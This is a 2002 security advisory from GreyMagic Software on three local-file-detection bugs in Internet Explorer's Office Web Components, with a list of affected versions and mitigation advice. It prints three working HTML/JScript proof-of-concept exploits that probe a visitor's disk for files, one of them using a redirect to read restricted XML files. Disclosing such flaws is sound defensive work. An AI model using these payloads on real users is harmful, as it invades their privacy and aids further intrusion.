Multiple local files detection issues with OWC in IE (GM#008-IE)

["GreyMagic Software" <security () greymagic com>]

GreyMagic Security Advisory GM#008-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm008-ie/.

Topic: Multiple local files detection issues with OWC in IE.

Discovery date: 25 Feb 2002, 05 Mar 2002.

Affected applications:
======================

* Office 2000 - Office Web Components 9, Chart component.
* Office XP - Office Web Components 10, Chart component.
* Office XP - Office Web Components 10, Spreadsheet component.
* Office XP - Office Web Components 10, DataSourceControl component.


Introduction:
=============

Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.


Discussion:
===========

There are several ways to check whether local files exist using OWC9 and
OWC10.

The first vulnerability is in the Chart component in both OWC9 and OWC10.
The "Load" method does not perform any security check on the assigned URL
and throws an error when given a file name that does not exist, otherwise
the file exists.

The second vulnerability is in the Spreadsheet component in OWC10. The
"XMLURL" property blindly follows redirections, so it is possible to assign
it a URL which redirects to a local file and determine whether it exists or
not by the error thrown. It is also possible to read properly formatted
WorkSheet XML files from disallowed locations in the same way.

The third vulnerability is in the DataSourceControl component in OWC10. The
"ConnectionFile" property does not perform any security checks on the
assigned URL. Therefore, it is possible to assign a local file and determine
whether it exists or not by the error thrown.


Exploit:
========

A simple exploit for the first vulnerability:

<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"
style="display:none"></object>
<!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
<script language="jscript">
onload=function () {
    try {
        oCS.Load("file://c:/test.txt");
        alert("File exists!");
    }
    catch (oErr) {
        alert("File does not exist.");
    }
}
</script>

A simple exploit for the second vulnerability, "getFile.asp" internally
redirects to "file://c:/test.txt":

<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oSP.XMLURL="getFile.asp";
    }
    catch (oErr) {
        alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" :
"File does not exist.");
    }
}
</script>

A simple exploit for the third vulnerability:

<object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oDS.ConnectionFile="file://c:/test.txt";
    }
    catch (oErr) {
        alert(oErr.number==-2146697211 ? "File does not exist." : "File
exists!");
    }
}
</script>


Solution:
=========

Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed, they have opened an investigation regarding
these issues.


Tested on:
==========

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of these issues is available
at http://security.greymagic.com/adv/gm008-ie/.


Feedback:
=========

Please mail any questions or comments to security () greymagic com.

- Copyright © 2002 GreyMagic Software.